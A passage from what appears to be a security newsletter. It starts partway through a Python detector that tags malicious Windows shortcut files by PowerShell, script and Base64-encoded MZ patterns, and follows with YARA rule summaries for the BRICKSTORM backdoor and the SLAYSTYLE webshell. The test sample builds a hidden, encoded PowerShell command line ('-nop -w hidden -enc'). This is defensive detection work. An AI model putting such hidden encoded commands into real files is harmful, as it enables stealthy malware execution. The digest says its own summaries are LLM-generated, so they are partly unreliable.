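    return data.startswith(LNK_MAGIC)


def scan_lnk(data):
    """Tags mirroring the four rules: isLNK, PS_in_LNK, Script_in_LNK, EXE_in_LNK."""
    tags = set()
    if not is_lnk(data):
        return tags
    tags.add("lnk")
    if _contains_any(data, PS_KEYWORDS):
        tags.add("powershell")
    if _contains_any(data, SCRIPT_KEYWORDS):
        tags.add("script")
    if _contains_any(data, MZ_B64, case_insensitive=False):   # Base64 is case-sensitive
        tags.add("base64_mz")
    return tags


# Constructed LNK-like buffer: real header bytes, zeroed header remainder, then
# UTF-16LE argument text carrying a Base64 blob whose decoded bytes start with an
# MZ header shifted by one byte (so the plain "TVqQ" string would not match).
_FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
_SHIFTED_B64 = base64.b64encode(b"\x00" + _FAKE_PE).decode("ascii")
SAMPLE_LNK = (LNK_MAGIC + b"\x00" * 68
              + ("/c powershell -nop -w hidden -enc " + _SHIFTED_B64).encode("utf-16-le"))
SAMPLE_TXT = b"MZ just a text file mentioning powershell"

if __name__ == "__main__":
    print(base64_variants(b"MZ\x90\x00\x03\x00\x00\x00"))
    print(sorted(scan_lnk(SAMPLE_LNK)), sorted(scan_lnk(SAMPLE_TXT)))
```

The alignment trick generalises to any byte sequence you want to find inside Base64 (a URL, a user-agent, a second-stage magic); keep the needle long enough that the trimmed variants are not a handful of characters, or the match will be noisy.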
Neo23x0/signature-base (✎3)
✎ Modified rules
Updated YARA rules cover malware associated with the China-nexus actor UNC5221. Detection for the BRICKSTORM backdoor identifies ELF files through magic numbers, byte patterns, and strings. A separate rule detects the SLAYSTYLE Java webshell by finding code for HTTP handling, Base64 decoding, and command execution. (MAL_G_APT_Backdoor_BRICKSTORM_2, WEBSHELL_G_APT_BackdoorWebshell_SLAYSTYLE_1)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.